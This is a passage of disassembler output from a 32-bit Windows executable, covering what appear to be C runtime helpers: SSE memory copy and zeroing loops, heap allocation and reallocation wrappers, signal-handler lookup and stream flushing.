		movdqa	xmm1, oword ptr	[esi+10h]
		movdqa	xmm2, oword ptr	[esi+20h]
		movdqa	xmm3, oword ptr	[esi+30h]
		movdqa	oword ptr [edi], xmm0
		movdqa	oword ptr [edi+10h], xmm1
		movdqa	oword ptr [edi+20h], xmm2
		movdqa	oword ptr [edi+30h], xmm3
		movdqa	xmm4, oword ptr	[esi+40h]
		movdqa	xmm5, oword ptr	[esi+50h]
		movdqa	xmm6, oword ptr	[esi+60h]
		movdqa	xmm7, oword ptr	[esi+70h]
		movdqa	oword ptr [edi+40h], xmm4
		movdqa	oword ptr [edi+50h], xmm5
		movdqa	oword ptr [edi+60h], xmm6
		movdqa	oword ptr [edi+70h], xmm7
		lea	esi, [esi+80h]
		lea	edi, [edi+80h]
		dec	ecx
		jnz	short loc_40DDC5
		mov	esi, [ebp+var_8]
		mov	edi, [ebp+var_4]
		mov	esp, ebp
		pop	ebp
		retn
sub_40DDA5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DE2C	proc near		; CODE XREF: sub_407930+42j
					; sub_4081B0+42j ...

var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		mov	[ebp+var_C], edi
		mov	[ebp+var_8], esi
		mov	[ebp+var_4], ebx
		mov	ebx, [ebp+arg_4]
		mov	eax, ebx
		cdq
		mov	ecx, eax
		mov	eax, [ebp+arg_0]
		xor	ecx, edx
		sub	ecx, edx
		and	ecx, 0Fh
		xor	ecx, edx
		sub	ecx, edx
		cdq
		mov	edi, eax
		xor	edi, edx
		sub	edi, edx
		and	edi, 0Fh
		xor	edi, edx
		sub	edi, edx
		mov	edx, ecx
		or	edx, edi
		jnz	short loc_40DEAF
		mov	esi, [ebp+arg_8]
		mov	ecx, esi
		and	ecx, 7Fh
		mov	[ebp+var_18], ecx
		cmp	esi, ecx
		jz	short loc_40DE87
		sub	esi, ecx
		push	esi
		push	ebx
		push	eax
		call	sub_40DDA5
		add	esp, 0Ch
		mov	eax, [ebp+arg_0]
		mov	ecx, [ebp+var_18]

loc_40DE87:				; CODE XREF: sub_40DE2C+46j
		test	ecx, ecx
		jz	short loc_40DF02
		mov	ebx, [ebp+arg_8]
		mov	edx, [ebp+arg_4]
		add	edx, ebx
		sub	edx, ecx
		mov	[ebp+var_14], edx
		add	ebx, eax
		sub	ebx, ecx
		mov	[ebp+var_10], ebx
		mov	esi, [ebp+var_14]
		mov	edi, [ebp+var_10]
		mov	ecx, [ebp+var_18]
		rep movsb
		mov	eax, [ebp+arg_0]
		jmp	short loc_40DF02
; ---------------------------------------------------------------------------

loc_40DEAF:				; CODE XREF: sub_40DE2C+37j
		cmp	ecx, edi
		jnz	short loc_40DEE8
		neg	ecx
		add	ecx, 10h
		mov	[ebp+var_1C], ecx
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+var_1C]
		rep movsb
		mov	ecx, [ebp+arg_0]
		add	ecx, [ebp+var_1C]
		mov	edx, [ebp+arg_4]
		add	edx, [ebp+var_1C]
		mov	eax, [ebp+arg_8]
		sub	eax, [ebp+var_1C]
		push	eax
		push	edx
		push	ecx
		call	sub_40DE2C
		add	esp, 0Ch
		mov	eax, [ebp+arg_0]
		jmp	short loc_40DF02
; ---------------------------------------------------------------------------

loc_40DEE8:				; CODE XREF: sub_40DE2C+85j
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+arg_8]
		mov	edx, ecx
		shr	ecx, 2
		rep movsd
		mov	ecx, edx
		and	ecx, 3
		rep movsb
		mov	eax, [ebp+arg_0]

loc_40DF02:				; CODE XREF: sub_40DE2C+5Dj
					; sub_40DE2C+81j ...
		mov	ebx, [ebp+var_4]
		mov	esi, [ebp+var_8]
		mov	edi, [ebp+var_C]
		mov	esp, ebp
		pop	ebp
		retn
sub_40DE2C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40DF0F	proc near		; CODE XREF: sub_407D3A+Ep

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

; FUNCTION CHUNK AT 0040E014 SIZE 00000019 BYTES

		push	0Ch
		push	offset dword_422D50
		call	__SEH_prolog4
		mov	ecx, [ebp+arg_0]
		xor	edi, edi
		cmp	ecx, edi
		jbe	short loc_40DF52
		push	0FFFFFFE0h
		pop	eax
		xor	edx, edx
		div	ecx
		cmp	eax, [ebp+arg_4]
		sbb	eax, eax
		inc	eax
		jnz	short loc_40DF52
		call	sub_405D93
		mov	dword ptr [eax], 0Ch
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h

loc_40DF4B:				; CODE XREF: sub_40DF0F+E6j
					; sub_40DF0F+F2j
		xor	eax, eax
		jmp	loc_40E027
; ---------------------------------------------------------------------------

loc_40DF52:				; CODE XREF: sub_40DF0F+13j
					; sub_40DF0F+22j
		imul	ecx, [ebp+arg_4]
		mov	esi, ecx
		mov	[ebp+arg_0], esi
		cmp	esi, edi
		jnz	short loc_40DF62
		xor	esi, esi
		inc	esi

loc_40DF62:				; CODE XREF: sub_40DF0F+4Ej
					; sub_40DF0F+DBj
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		cmp	esi, 0FFFFFFE0h
		ja	short loc_40DFD5
		cmp	dword_438854, 3
		jnz	short loc_40DFC0
		add	esi, 0Fh
		and	esi, 0FFFFFFF0h
		mov	[ebp+arg_4], esi
		mov	eax, [ebp+arg_0]
		cmp	eax, dword_438844
		ja	short loc_40DFC0
		push	4
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	[ebp+arg_0]
		call	sub_4068B9
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40E00B
		mov	ebx, [ebp+var_1C]
		cmp	ebx, edi
		jz	short loc_40DFC4
		push	[ebp+arg_0]
		push	edi
		push	ebx
		call	sub_408130
		add	esp, 0Ch

loc_40DFC0:				; CODE XREF: sub_40DF0F+64j
					; sub_40DF0F+78j
		cmp	ebx, edi
		jnz	short loc_40E025

loc_40DFC4:				; CODE XREF: sub_40DF0F+A2j
		push	esi
		push	8
		push	dword_4282C8
		call	ds:dword_41E110	; RtlAllocateHeap
		mov	ebx, eax

loc_40DFD5:				; CODE XREF: sub_40DF0F+5Bj
		cmp	ebx, edi
		jnz	short loc_40E025
		cmp	dword_42864C, edi
		jz	short loc_40E014
		push	esi
		call	sub_408622
		pop	ecx
		test	eax, eax
		jnz	loc_40DF62
		mov	eax, [ebp+arg_8]
		cmp	eax, edi
		jz	loc_40DF4B
		mov	dword ptr [eax], 0Ch
		jmp	loc_40DF4B
sub_40DF0F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E006	proc near		; DATA XREF: jlrllt49:00422D68o
		xor	edi, edi
		mov	esi, [ebp+0Ch]
sub_40E006	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40E00B	proc near		; CODE XREF: sub_40DF0F+98p
		push	4
		call	sub_405EDF
		pop	ecx
		retn
sub_40E00B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40DF0F

loc_40E014:				; CODE XREF: sub_40DF0F+D0j
		cmp	ebx, edi
		jnz	short loc_40E025
		mov	eax, [ebp+arg_8]
		cmp	eax, edi
		jz	short loc_40E025
		mov	dword ptr [eax], 0Ch

loc_40E025:				; CODE XREF: sub_40DF0F+B3j
					; sub_40DF0F+C8j ...
		mov	eax, ebx

loc_40E027:				; CODE XREF: sub_40DF0F+3Ej
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40DF0F

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E02D	proc near		; CODE XREF: sub_407D82+Cp
					; sub_40E248+3Ep

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0040E17A SIZE 000000CE BYTES

		push	10h
		push	offset dword_422D70
		call	__SEH_prolog4
		mov	ebx, [ebp+arg_0]
		test	ebx, ebx
		jnz	short loc_40E04E
		push	[ebp+arg_4]
		call	sub_403C6E
		pop	ecx
		jmp	loc_40E21A
; ---------------------------------------------------------------------------

loc_40E04E:				; CODE XREF: sub_40E02D+11j
		mov	esi, [ebp+arg_4]
		test	esi, esi
		jnz	short loc_40E061
		push	ebx
		call	sub_403B91
		pop	ecx
		jmp	loc_40E218
; ---------------------------------------------------------------------------

loc_40E061:				; CODE XREF: sub_40E02D+26j
		cmp	dword_438854, 3
		jnz	loc_40E201

loc_40E06E:				; CODE XREF: sub_40E02D+169j
		xor	edi, edi
		mov	[ebp+var_1C], edi
		cmp	esi, 0FFFFFFE0h
		ja	loc_40E206
		push	4
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	ebx
		call	sub_4060E5
		pop	ecx
		mov	[ebp+var_20], eax
		cmp	eax, edi
		jz	loc_40E137
		cmp	esi, dword_438844
		ja	short loc_40E0EA
		push	esi
		push	ebx
		push	eax
		call	sub_4065DA
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40E0B5
		mov	[ebp+var_1C], ebx
		jmp	short loc_40E0EA
; ---------------------------------------------------------------------------

loc_40E0B5:				; CODE XREF: sub_40E02D+81j
		push	esi
		call	sub_4068B9
		pop	ecx
		mov	[ebp+var_1C], eax
		cmp	eax, edi
		jz	short loc_40E0EA
		mov	eax, [ebx-4]
		dec	eax
		cmp	eax, esi
		jb	short loc_40E0CD
		mov	eax, esi

loc_40E0CD:				; CODE XREF: sub_40E02D+9Cj
		push	eax
		push	ebx
		push	[ebp+var_1C]
		call	sub_4081B0
		push	ebx
		call	sub_4060E5
		mov	[ebp+var_20], eax
		push	ebx
		push	eax
		call	sub_406110
		add	esp, 18h

loc_40E0EA:				; CODE XREF: sub_40E02D+72j
					; sub_40E02D+86j ...
		cmp	[ebp+var_1C], edi
		jnz	short loc_40E137
		cmp	esi, edi
		jnz	short loc_40E0F9
		xor	esi, esi
		inc	esi
		mov	[ebp+arg_4], esi

loc_40E0F9:				; CODE XREF: sub_40E02D+C4j
		add	esi, 0Fh
		and	esi, 0FFFFFFF0h
		mov	[ebp+arg_4], esi
		push	esi
		push	edi
		push	dword_4282C8
		call	ds:dword_41E110	; RtlAllocateHeap
		mov	[ebp+var_1C], eax
		cmp	eax, edi
		jz	short loc_40E137
		mov	eax, [ebx-4]
		dec	eax
		cmp	eax, esi
		jb	short loc_40E121
		mov	eax, esi

loc_40E121:				; CODE XREF: sub_40E02D+F0j
		push	eax
		push	ebx
		push	[ebp+var_1C]
		call	sub_4081B0
		push	ebx
		push	[ebp+var_20]
		call	sub_406110
		add	esp, 14h

loc_40E137:				; CODE XREF: sub_40E02D+66j
					; sub_40E02D+C0j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40E171
		cmp	[ebp+var_20], 0
		jnz	short loc_40E17A
		test	esi, esi
		jnz	short loc_40E14E
		inc	esi

loc_40E14E:				; CODE XREF: sub_40E02D+11Ej
		add	esi, 0Fh
		and	esi, 0FFFFFFF0h
		mov	[ebp+arg_4], esi
		push	esi
		push	ebx
		push	0
		push	dword_4282C8
		call	ds:off_41E150
		mov	edi, eax
		jmp	short loc_40E17D
sub_40E02D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E16B	proc near		; DATA XREF: jlrllt49:00422D88o
		mov	esi, [ebp+0Ch]
		mov	ebx, [ebp+8]
sub_40E16B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40E171	proc near		; CODE XREF: sub_40E02D+111p
		push	4
		call	sub_405EDF
		pop	ecx
		retn
sub_40E171	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40E02D

loc_40E17A:				; CODE XREF: sub_40E02D+11Aj
		mov	edi, [ebp+var_1C]

loc_40E17D:				; CODE XREF: sub_40E02D+13Cj
		test	edi, edi
		jnz	loc_40E244
		cmp	dword_42864C, edi
		jz	short loc_40E1B9
		push	esi
		call	sub_408622
		pop	ecx
		test	eax, eax
		jnz	loc_40E06E
		call	sub_405D93
		cmp	[ebp+var_20], edi
		jnz	short loc_40E212

loc_40E1A6:				; CODE XREF: sub_40E02D+1F8j
		mov	esi, eax
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405D58
		pop	ecx
		mov	[esi], eax
		jmp	short loc_40E218
; ---------------------------------------------------------------------------

loc_40E1B9:				; CODE XREF: sub_40E02D+15Ej
		test	edi, edi
		jnz	loc_40E244
		call	sub_405D93
		cmp	[ebp+var_20], edi
		jz	short loc_40E233
		mov	dword ptr [eax], 0Ch
		jmp	short loc_40E244
; ---------------------------------------------------------------------------

loc_40E1D3:				; CODE XREF: sub_40E02D+1D7j
		test	esi, esi
		jnz	short loc_40E1D8
		inc	esi

loc_40E1D8:				; CODE XREF: sub_40E02D+1A8j
		push	esi
		push	ebx
		push	0
		push	dword_4282C8
		call	ds:off_41E150
		mov	edi, eax
		test	edi, edi
		jnz	short loc_40E244
		cmp	dword_42864C, eax
		jz	short loc_40E22A
		push	esi
		call	sub_408622
		pop	ecx
		test	eax, eax
		jz	short loc_40E220

loc_40E201:				; CODE XREF: sub_40E02D+3Bj
		cmp	esi, 0FFFFFFE0h
		jbe	short loc_40E1D3

loc_40E206:				; CODE XREF: sub_40E02D+49j
		push	esi
		call	sub_408622
		pop	ecx
		call	sub_405D93

loc_40E212:				; CODE XREF: sub_40E02D+177j
		mov	dword ptr [eax], 0Ch

loc_40E218:				; CODE XREF: sub_40E02D+2Fj
					; sub_40E02D+18Aj
		xor	eax, eax

loc_40E21A:				; CODE XREF: sub_40E02D+1Cj
					; sub_40E02D+219j
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_40E220:				; CODE XREF: sub_40E02D+1D2j
		call	sub_405D93
		jmp	loc_40E1A6
; ---------------------------------------------------------------------------

loc_40E22A:				; CODE XREF: sub_40E02D+1C7j
		test	edi, edi
		jnz	short loc_40E244
		call	sub_405D93

loc_40E233:				; CODE XREF: sub_40E02D+19Cj
		mov	esi, eax
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405D58
		mov	[esi], eax
		pop	ecx

loc_40E244:				; CODE XREF: sub_40E02D+152j
					; sub_40E02D+18Ej ...
		mov	eax, edi
		jmp	short loc_40E21A
; END OF FUNCTION CHUNK	FOR sub_40E02D

; =============== S U B	R O U T	I N E =======================================



sub_40E248	proc near		; CODE XREF: sub_407DCD+10p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	ecx, [esp+arg_4]
		push	esi
		xor	esi, esi
		cmp	ecx, esi
		jbe	short loc_40E27C
		push	0FFFFFFE0h
		xor	edx, edx
		pop	eax
		div	ecx
		cmp	eax, [esp+4+arg_8]
		jnb	short loc_40E27C
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 0Ch
		call	sub_4034C7
		add	esp, 14h
		xor	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40E27C:				; CODE XREF: sub_40E248+9j
					; sub_40E248+16j
		imul	ecx, [esp+4+arg_8]
		push	ecx
		push	[esp+8+arg_0]
		call	sub_40E02D
		pop	ecx
		pop	ecx
		pop	esi
		retn
sub_40E248	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E28F	proc near		; CODE XREF: sub_4080D9+27p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_428784, eax
		mov	dword_428788, eax
		mov	dword_42878C, eax
		mov	dword_428790, eax
		retn
sub_40E28F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E2A8	proc near		; CODE XREF: sub_40E2E9+5Ap

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, dword_424E44
		push	esi

loc_40E2B3:				; CODE XREF: sub_40E2A8+1Ej
		cmp	[eax+4], edx
		jz	short loc_40E2C8
		mov	esi, ecx
		imul	esi, 0Ch
		add	esi, [esp+4+arg_0]
		add	eax, 0Ch
		cmp	eax, esi
		jb	short loc_40E2B3

loc_40E2C8:				; CODE XREF: sub_40E2A8+Ej
		imul	ecx, 0Ch
		add	ecx, [esp+4+arg_0]
		pop	esi
		cmp	eax, ecx
		jnb	short loc_40E2D9
		cmp	[eax+4], edx
		jz	short locret_40E2DB

loc_40E2D9:				; CODE XREF: sub_40E2A8+2Aj
		xor	eax, eax

locret_40E2DB:				; CODE XREF: sub_40E2A8+2Fj
		retn
sub_40E2A8	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E2DC	proc near		; CODE XREF: sub_41077D:loc_4107AAp
		push	dword_42878C
		call	sub_405753
		pop	ecx
		retn
sub_40E2DC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E2E9	proc near		; CODE XREF: sub_41077D+38p

var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 0040E493 SIZE 00000006 BYTES

		push	20h
		push	offset dword_422D90
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+var_1C], edi
		mov	[ebp+var_28], edi
		mov	ebx, [ebp+arg_0]
		cmp	ebx, 0Bh
		jg	short loc_40E351
		jz	short loc_40E31C
		mov	eax, ebx
		push	2
		pop	ecx
		sub	eax, ecx
		jz	short loc_40E332
		sub	eax, ecx
		jz	short loc_40E31C
		sub	eax, ecx
		jz	short loc_40E37C
		sub	eax, ecx
		jnz	short loc_40E360

loc_40E31C:				; CODE XREF: sub_40E2E9+1Cj
					; sub_40E2E9+29j
		call	sub_4058DA
		mov	edi, eax
		mov	[ebp+var_28], edi
		test	edi, edi
		jnz	short loc_40E33E

loc_40E32A:				; CODE XREF: sub_40E2E9+91j
		or	eax, 0FFFFFFFFh
		jmp	loc_40E493
; ---------------------------------------------------------------------------

loc_40E332:				; CODE XREF: sub_40E2E9+25j
		mov	esi, offset dword_428784
		mov	eax, dword_428784
		jmp	short loc_40E39E
; ---------------------------------------------------------------------------

loc_40E33E:				; CODE XREF: sub_40E2E9+3Fj
		push	dword ptr [edi+5Ch]
		mov	edx, ebx
		call	sub_40E2A8
		mov	esi, eax
		add	esi, 8
		mov	eax, [esi]
		jmp	short loc_40E3AB
; ---------------------------------------------------------------------------

loc_40E351:				; CODE XREF: sub_40E2E9+1Aj
		mov	eax, ebx
		sub	eax, 0Fh
		jz	short loc_40E394
		sub	eax, 6
		jz	short loc_40E388
		dec	eax
		jz	short loc_40E37C

loc_40E360:				; CODE XREF: sub_40E2E9+31j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40E32A
; ---------------------------------------------------------------------------

loc_40E37C:				; CODE XREF: sub_40E2E9+2Dj
					; sub_40E2E9+75j
		mov	esi, offset dword_42878C
		mov	eax, dword_42878C
		jmp	short loc_40E39E
; ---------------------------------------------------------------------------

loc_40E388:				; CODE XREF: sub_40E2E9+72j
		mov	esi, offset dword_428788
		mov	eax, dword_428788
		jmp	short loc_40E39E
; ---------------------------------------------------------------------------

loc_40E394:				; CODE XREF: sub_40E2E9+6Dj
		mov	esi, offset dword_428790
		mov	eax, dword_428790

loc_40E39E:				; CODE XREF: sub_40E2E9+53j
					; sub_40E2E9+9Dj ...
		mov	[ebp+var_1C], 1
		push	eax
		call	sub_405753

loc_40E3AB:				; CODE XREF: sub_40E2E9+66j
		mov	[ebp+var_20], eax
		pop	ecx
		xor	eax, eax
		cmp	[ebp+var_20], 1
		jz	loc_40E493
		cmp	[ebp+var_20], eax
		jnz	short loc_40E3C7
		push	3
		call	sub_4080AA

loc_40E3C7:				; CODE XREF: sub_40E2E9+D5j
		cmp	[ebp+var_1C], eax
		jz	short loc_40E3D3
		push	eax
		call	sub_405FB7
		pop	ecx

loc_40E3D3:				; CODE XREF: sub_40E2E9+E1j
		xor	eax, eax
		mov	[ebp+ms_exc.disabled], eax
		cmp	ebx, 8
		jz	short loc_40E3E7
		cmp	ebx, 0Bh
		jz	short loc_40E3E7
		cmp	ebx, 4
		jnz	short loc_40E402

loc_40E3E7:				; CODE XREF: sub_40E2E9+F2j
					; sub_40E2E9+F7j
		mov	ecx, [edi+60h]
		mov	[ebp+var_2C], ecx
		mov	[edi+60h], eax
		cmp	ebx, 8
		jnz	short loc_40E435
		mov	ecx, [edi+64h]
		mov	[ebp+var_30], ecx
		mov	dword ptr [edi+64h], 8Ch

loc_40E402:				; CODE XREF: sub_40E2E9+FCj
		cmp	ebx, 8
		jnz	short loc_40E435
		mov	ecx, dword_424E38
		mov	[ebp+var_24], ecx

loc_40E410:				; CODE XREF: sub_40E2E9+14Aj
		mov	ecx, dword_424E3C
		mov	edx, dword_424E38
		add	ecx, edx
		cmp	[ebp+var_24], ecx
		jge	short loc_40E43C
		mov	ecx, [ebp+var_24]
		imul	ecx, 0Ch
		mov	edx, [edi+5Ch]
		mov	[ecx+edx+8], eax
		inc	[ebp+var_24]
		jmp	short loc_40E410
; ---------------------------------------------------------------------------

loc_40E435:				; CODE XREF: sub_40E2E9+10Aj
					; sub_40E2E9+11Cj
		call	sub_40574A
		mov	[esi], eax

loc_40E43C:				; CODE XREF: sub_40E2E9+138j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40E45D
		cmp	ebx, 8
		jnz	short sub_40E46C
		push	dword ptr [edi+64h]
		push	ebx
		call	[ebp+var_20]
		pop	ecx
		jmp	short loc_40E470
sub_40E2E9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40E457	proc near		; DATA XREF: jlrllt49:00422DA8o
		mov	ebx, [ebp+8]
		mov	edi, [ebp-28h]
sub_40E457	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40E45D	proc near		; CODE XREF: sub_40E2E9+15Ap
		cmp	dword ptr [ebp-1Ch], 0
		jz	short locret_40E46B
		push	0
		call	sub_405EDF
		pop	ecx

locret_40E46B:				; CODE XREF: sub_40E45D+4j
		retn
sub_40E45D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E46C	proc near		; CODE XREF: sub_40E2E9+162j
		push	ebx
		call	dword ptr [ebp-20h]

loc_40E470:				; CODE XREF: sub_40E2E9+16Cj
		pop	ecx
		cmp	ebx, 8
		jz	short loc_40E480
		cmp	ebx, 0Bh
		jz	short loc_40E480
		cmp	ebx, 4
		jnz	short loc_40E491

loc_40E480:				; CODE XREF: sub_40E46C+8j
					; sub_40E46C+Dj
		mov	eax, [ebp-2Ch]
		mov	[edi+60h], eax
		cmp	ebx, 8
		jnz	short loc_40E491
		mov	eax, [ebp-30h]
		mov	[edi+64h], eax

loc_40E491:				; CODE XREF: sub_40E46C+12j
					; sub_40E46C+1Dj
		xor	eax, eax
sub_40E46C	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_40E2E9

loc_40E493:				; CODE XREF: sub_40E2E9+44j
					; sub_40E2E9+CCj
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40E2E9

; =============== S U B	R O U T	I N E =======================================



sub_40E499	proc near		; CODE XREF: sub_4080D9+21p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_428798, eax
		retn
sub_40E499	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E4A3	proc near		; CODE XREF: sub_4080D9+1Bp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_4287A4, eax
		retn
sub_40E4A3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E4AD	proc near		; CODE XREF: sub_40E504+31p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 4
		mov	[ebp+var_4], edi
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+arg_4]
		shr	ecx, 7
		pxor	xmm0, xmm0
		jmp	short loc_40E4CD
; ---------------------------------------------------------------------------
		db 8Dh,	0A4h, 24h, 4 dup(0)
		db 90h
; ---------------------------------------------------------------------------

loc_40E4CD:				; CODE XREF: sub_40E4AD+16j
					; sub_40E4AD+4Ej
		movdqa	oword ptr [edi], xmm0
		movdqa	oword ptr [edi+10h], xmm0
		movdqa	oword ptr [edi+20h], xmm0
		movdqa	oword ptr [edi+30h], xmm0
		movdqa	oword ptr [edi+40h], xmm0
		movdqa	oword ptr [edi+50h], xmm0
		movdqa	oword ptr [edi+60h], xmm0
		movdqa	oword ptr [edi+70h], xmm0
		lea	edi, [edi+80h]
		dec	ecx
		jnz	short loc_40E4CD
		mov	edi, [ebp+var_4]
		mov	esp, ebp
		pop	ebp
		retn
sub_40E4AD	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E504	proc near		; CODE XREF: sub_408130+27j
					; sub_40E504+7Dp

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	[ebp+var_4], edi
		mov	eax, [ebp+arg_0]
		cdq
		mov	edi, eax
		xor	edi, edx
		sub	edi, edx
		and	edi, 0Fh
		xor	edi, edx
		sub	edi, edx
		test	edi, edi
		jnz	short loc_40E55E
		mov	ecx, [ebp+arg_8]
		mov	edx, ecx
		and	edx, 7Fh
		mov	[ebp+var_C], edx
		cmp	ecx, edx
		jz	short loc_40E543
		sub	ecx, edx
		push	ecx
		push	eax
		call	sub_40E4AD
		add	esp, 8
		mov	eax, [ebp+arg_0]
		mov	edx, [ebp+var_C]

loc_40E543:				; CODE XREF: sub_40E504+2Bj
		test	edx, edx
		jz	short loc_40E58C
		add	eax, [ebp+arg_8]
		sub	eax, edx
		mov	[ebp+var_8], eax
		xor	eax, eax
		mov	edi, [ebp+var_8]
		mov	ecx, [ebp+var_C]
		rep stosb
		mov	eax, [ebp+arg_0]
		jmp	short loc_40E58C
; ---------------------------------------------------------------------------

loc_40E55E:				; CODE XREF: sub_40E504+1Cj
		neg	edi
		add	edi, 10h
		mov	[ebp+var_10], edi
		xor	eax, eax
		mov	edi, [ebp+arg_0]
		mov	ecx, [ebp+var_10]
		rep stosb
		mov	eax, [ebp+var_10]
		mov	ecx, [ebp+arg_0]
		mov	edx, [ebp+arg_8]
		add	ecx, eax
		sub	edx, eax
		push	edx
		push	0
		push	ecx
		call	sub_40E504
		add	esp, 0Ch
		mov	eax, [ebp+arg_0]

loc_40E58C:				; CODE XREF: sub_40E504+41j
					; sub_40E504+58j
		mov	edi, [ebp+var_4]
		mov	esp, ebp
		pop	ebp
		retn
sub_40E504	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40E593	proc near		; CODE XREF: sub_4086FB+Ep

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	10h
		push	offset dword_422DB0
		call	__SEH_prolog4
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		push	1
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		push	3
		pop	edi

loc_40E5B2:				; CODE XREF: sub_40E593+7Fj
		mov	[ebp+var_20], edi
		cmp	edi, dword_438820
		jge	short loc_40E614
		mov	esi, edi
		shl	esi, 2
		mov	eax, dword_437800
		add	eax, esi
		cmp	[eax], ebx
		jz	short loc_40E611
		mov	eax, [eax]
		test	byte ptr [eax+0Ch], 83h
		jz	short loc_40E5E4
		push	eax
		call	sub_403A52
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40E5E4
		inc	[ebp+var_1C]

loc_40E5E4:				; CODE XREF: sub_40E593+40j
					; sub_40E593+4Cj
		cmp	edi, 14h
		jl	short loc_40E611
		mov	eax, dword_437800
		mov	eax, [esi+eax]
		add	eax, 20h
		push	eax
		call	ds:off_41E16C
		mov	eax, dword_437800
		push	dword ptr [esi+eax]
		call	sub_403B91
		pop	ecx
		mov	eax, dword_437800
		mov	[esi+eax], ebx

loc_40E611:				; CODE XREF: sub_40E593+38j
					; sub_40E593+54j
		inc	edi
		jmp	short loc_40E5B2
; ---------------------------------------------------------------------------

loc_40E614:				; CODE XREF: sub_40E593+28j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40E629
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40E593	endp


; =============== S U B	R O U T	I N E =======================================



sub_40E629	proc near		; CODE XREF: sub_40E593+88p
					; DATA XREF: jlrllt49:00422DC8o
		push	1
		call	sub_405EDF
		pop	ecx
		retn
sub_40E629	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


